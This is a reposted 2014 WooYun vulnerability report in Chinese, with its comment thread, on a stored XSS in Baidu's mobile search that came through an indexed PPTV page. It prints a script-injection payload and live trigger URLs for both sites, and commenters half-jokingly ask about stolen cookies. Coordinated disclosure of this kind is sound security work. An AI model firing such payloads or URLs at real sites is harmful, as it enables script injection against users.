百度主站一处有趣的储存型xss漏洞(第三方网站引起)

admin 2015年4月21日10:00:14评论478 views字数 242阅读0分48秒阅读模式
摘要

2014-07-06: 细节已通知厂商并且等待厂商处理中
2014-07-07: 厂商已经确认,细节仅向厂商公开
2014-07-17: 细节向核心白帽子及相关领域专家公开
2014-07-27: 细节向普通白帽子公开
2014-08-06: 细节向实习白帽子公开
2014-08-20: 细节向公众公开

漏洞概要 关注数(15) 关注此漏洞

缺陷编号: WooYun-2014-67571

漏洞标题: 百度主站一处有趣的储存型xss漏洞(第三方网站引起)

相关厂商: 百度

漏洞作者: Mosuan

提交时间: 2014-07-06 01:02

公开时间: 2014-08-20 01:04

漏洞类型: XSS 跨站脚本攻击

危害等级: 低

自评Rank: 1

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 持久型xss 存储型xss xss利用技巧 xss黑盒测试技巧 xss技巧

1人收藏


漏洞详情

披露状态:

2014-07-06: 细节已通知厂商并且等待厂商处理中
2014-07-07: 厂商已经确认,细节仅向厂商公开
2014-07-17: 细节向核心白帽子及相关领域专家公开
2014-07-27: 细节向普通白帽子公开
2014-08-06: 细节向实习白帽子公开
2014-08-20: 细节向公众公开

简要描述:

xss

详细说明:

上班的时候意淫了一下百度。。。。结果就弹窗了。。。

上班的时候用手机搜索了一下xss语句,

测试环境:QQ浏览器、安卓系统

code 区域
"/>"<script>alert(/xss/)</script>

搜索这个时,到第三第四页弹窗

code 区域
http://m.baidu.com/from=1000953b/pu=sz%401320_480/s?pn=20&st=111081&word=%22%2F%3E%22%3Cscript%3Ealert%28%2Fxss%2F%29%3C%2Fscript%3E&sa=np

注意是第三第四页才弹窗

百度主站一处有趣的储存型xss漏洞(第三方网站引起)

对于我们这种闲到蛋疼的人,果断追查是由什么引起的

查看下源代码

百度主站一处有趣的储存型xss漏洞(第三方网站引起)

得知是由pptv引起的

追朔到pptv插入xss的地址

pptv也弹窗了- -

code 区域
http://v.pptv.com/show/g2P8euJIuPZZ1z8.html

百度主站一处有趣的储存型xss漏洞(第三方网站引起)

好吧,搜索到第三第四页不是每个人都那么逗比的。

既然pptv这个xss被收录了,就直接百度这个url就OK了

最后得到地址

code 区域
http://m.baidu.com/from=1000953b/pu=sz%401320_480/s?word=http%3A%2F%2Fv.pptv.com%2Fshow%2Fg2P8euJIuPZZ1z8.html&st=111041&sa=tb&ts=0

本想还测试别的搜索引擎的,想想算了吧,php又呼唤我了。

漏洞证明:

@百度 @pptv 电脑版也可以xss,能上前台了吧?

修复方案:

转吧。。

版权声明:转载请注明来源 Mosuan@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2014-07-07 10:39

厂商回复:

感谢对百度安全的支持。

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

  1. 2014-07-06 01:12 | 随随意意 ( 普通白帽子 | Rank:175 漏洞数:36 )

    1

    额,插了主站么,主站弹个框看看

  2. 2014-07-06 11:00 | Rpsx/** ( 路人 | Rank:8 漏洞数:1 )

    1

    撸掉了外部JS么..

  3. 2014-07-06 11:58 | Mosuan ( 普通白帽子 | Rank:449 漏洞数:175 | 尘封此号,不装逼了,再见孩子们。by Mosua...)

    3

    @Rpsx/** 不,到时候你就知道了

  4. 2014-07-06 13:33 | M4sk ( 普通白帽子 | Rank:1218 漏洞数:323 | 啥都不会....)

    0

    主站弹个框看看。。。。。。。。。。。。。。。

  5. 2014-07-06 13:41 | 浅兮 ( 实习白帽子 | Rank:70 漏洞数:30 )

    2

    主站哦!cookie搞到了吗?

  6. 2014-07-06 13:49 | Mosuan ( 普通白帽子 | Rank:449 漏洞数:175 | 尘封此号,不装逼了,再见孩子们。by Mosua...)

    1

    @浅兮 @M4sk 我要放弃治疗了。标题党,你懂的

  7. 2014-07-06 13:56 | 浅兮 ( 实习白帽子 | Rank:70 漏洞数:30 )

    1

    @Mosuan 我打酱油,关注一下!

  8. 2014-07-07 10:50 | 雷锋 ( 路人 | Rank:12 漏洞数:2 | 看人生万般无奈,看世间千姿百态...)

    0

    显然。后面几个字是多余得。。。影响围观人数。

  9. 2014-07-07 14:10 | Mosuan ( 普通白帽子 | Rank:449 漏洞数:175 | 尘封此号,不装逼了,再见孩子们。by Mosua...)

    0

    @雷锋 在我眼里不是多余的,后面的才是重点

  10. 2014-08-20 01:09 | 李旭敏 ( 普通白帽子 | Rank:840 漏洞数:115 | ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎...)

    0

    洞主其实和我这个 WooYun: 搜狗某分站搜索引擎xss漏洞 漏洞原理是一样的···

  11. 2014-08-20 08:46 | Mosuan ( 普通白帽子 | Rank:449 漏洞数:175 | 尘封此号,不装逼了,再见孩子们。by Mosua...)

    1

    @李旭敏 额

  12. 2014-08-20 09:57 | latershow ( 路人 | Rank:24 漏洞数:6 | andr0day)

    0

    http://m.baidu.com/from=1000953b/pu=sz%401320_480/s?word=http%3A%2F%2Fv.pptv.com%2Fshow%2Fg2P8euJIuPZZ1z8.html&st=111041&sa=tb&ts=0 还能弹哟

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin